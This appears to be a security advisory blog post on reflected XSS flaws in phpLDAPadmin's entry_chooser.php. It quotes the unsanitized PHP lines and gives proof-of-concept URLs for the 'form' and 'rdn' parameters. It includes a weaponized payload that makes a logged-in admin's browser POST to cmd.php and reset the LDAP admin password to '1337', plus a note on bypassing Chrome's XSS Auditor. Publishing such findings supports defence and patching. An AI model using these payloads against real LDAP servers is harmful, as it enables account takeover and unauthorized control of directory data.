Software Description
phpLDAPadmin is an web-based LDAP adminstration interface for viewing and manipulating LDAP information.Vulnerability Description
$request['form'] and $request['rdn'] parameters in file htdocs/entry_chooser.php aren't properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/Javascript code in a user's context.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Line 18 | |
| $request['form'] = get_request('form','GET'); | |
| // Line 20 | |
| $request['rdn'] = get_request('rdn','GET'); | |
| // Line 27 | |
| printf(" eval ('o = opener.document.getElementById(\"%s\").%s;');",$request['form'],$request['element']); | |
| // 74 | |
| $href['return'] = sprintf("javascript:returnDN('%s%s')",($request['rdn'] ? sprintf('%s,',$request['rdn']) : ''),str_replace('\\','\\\\',$dn)); |
Proof of Concept (PoC)
XSS via the 'form' parameter:
http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test
XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass):
http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Changing admin password to '1337'
PAYLOAD : %22).base;%27);}%20var%20http=new%20XMLHttpRequest();%20var%20url=%22http://localhost:8888/phpldapadmin/cmd.php%22;%20var%20params=%22cmd%3Dupdate%2526server_id%3D1%2526dn%3Dcn%25253D<LOGIN_DN>%2526new_values%25255Buserpassword%25255D%25255B0%25255D%3D%25257BSSHA%25257Dxtzm0RhdgidTmNnRD0rvUdjCcGhPQgKa%22;%20http.open(%22POST%22,%20url,%20true);%20http.setRequestHeader(%22Content-type%22,%20%22application/x-www-form-urlencoded%22);%20http.send(params);%20function%20lol()%20{%20isNaN(%27
<LOGIN_DN> : Triple URL-Encoded login dn (Ex: cn%253Dadmin%252Cdc%253Dldap%252Cdc%253Dcom)
PoC URL:
http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20var%20http=new%20XMLHttpRequest();%20var%20url=%22http://localhost:8888/phpldapadmin/cmd.php%22;%20var%20params=%22cmd%3Dupdate%2526server_id%3D1%2526dn%3Dcn%25253Dadmin%25252Cdc%25253Dldap%25252Cdc%25253Dcom%2526new_values%25255Buserpassword%25255D%25255B0%25255D%3D%25257BSSHA%25257Dxtzm0RhdgidTmNnRD0rvUdjCcGhPQgKa%22;%20http.open(%22POST%22,%20url,%20true);%20http.setRequestHeader(%22Content-type%22,%20%22application/x-www-form-urlencoded%22);%20http.send(params);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test
References
https://bugs.launchpad.net/ubuntu/+source/phpldapadmin/+bug/1701731https://github.com/leenooks/phpLDAPadmin/issues/50
Comments
Post a Comment